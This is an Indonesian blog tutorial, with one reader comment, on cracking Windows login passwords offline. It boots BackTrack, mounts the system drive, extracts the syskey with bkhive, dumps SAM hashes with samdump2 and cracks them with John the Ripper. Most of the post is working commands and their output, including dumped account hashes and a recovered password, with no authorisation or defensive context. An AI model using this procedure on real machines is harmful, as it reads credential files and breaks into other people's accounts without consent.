Sehingga kegiatan Cracking Menjadi sulit karena harus mendapatkan nilai syskey sebelumnya untuk melakukan cracking pada password Windows. Disini kita kan manggunakan bkhive untuk untuk mendapatkan syskey dan Samdump untuk mendapatkan hash dari file SAM. Terakhir file hash kita akan crack menggunakan John The Ripper.
1. Booting DVD Backtrack dan mount drive C pada windows
root@root:~# fdisk -l Disk /dev/sda: 10.7 GB, 10737418240 bytes 255 heads, 63 sectors/track, 1305 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0xf9c9f9c9 Device Boot Start End Blocks Id System /dev/sda1 * 1 1304 10474348+ 7 HPFS/NTFS root@root:~# mkdir /mnt/sda1 root@root:~# mount -t ntfs /dev/sda1 /mnt/sda1 -o force
2. Ambil key dari system menggunakan bkhive simpan menjadi key.txt
root@root:~# cd /mnt/sda1/WINDOWS/system32/config/ root@root:/mnt/sda1/WINDOWS/system32/config# bkhive system ~/Desktop/key.txt bkhive 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it Root Key : $$$PROTO.HIV Default ControlSet: 001 Bootkey: e5ff38114c42c939dd424d743c2449de
3. Gunakan samdump2 untuk mendapatkan hash dari file SAM dan key.txt simpan menjadi hash.txt
root@root:/mnt/sda1/WINDOWS/system32/config# samdump2 SAM ~/Desktop/key.txt > ~/Desktop/hash.txt samdump2 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it Root Key : SAM root@root:/mnt/sda1/WINDOWS/system32/config# cat ~/Desktop/hash.txt Administrator:500:ad14d8a198d59425aad3b435b51404ee:3b8c3f78f6234c65f1546c64d2f60c02::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:c777e627a172ac2746aa5c01317bb49b:c89f1c86ea7236bf367851f3c58797be::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c5b7293e8c3265d42977595b48810830::: octopurba:1003:a17aad0ec01bbbe934a157cfdb7ad51f:b5034028f7b2ae3cf9e93b1181a39f2e:::
4. Crack file dari hash.txt menggunakan John The Ripper
root@root:/mnt/sda1/WINDOWS/system32/config# cd /pentest/passwords/john/ root@root:/pentest/passwords/john# ./john ~/Desktop/hash.txt Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2]) GILAKOM (octopurba:1) (SUPPORT_388945a0) (Guest) PUTER (octopurba:2)
diatas kita bisa melihat bahwa password adalah "gilakomputer" untuk user "octopurba".
ane da coba, tapi kok yang muncul Error opening hive file system,,,waduuuhhh ane jadi bingung niee dan... ~x(
ReplyDelete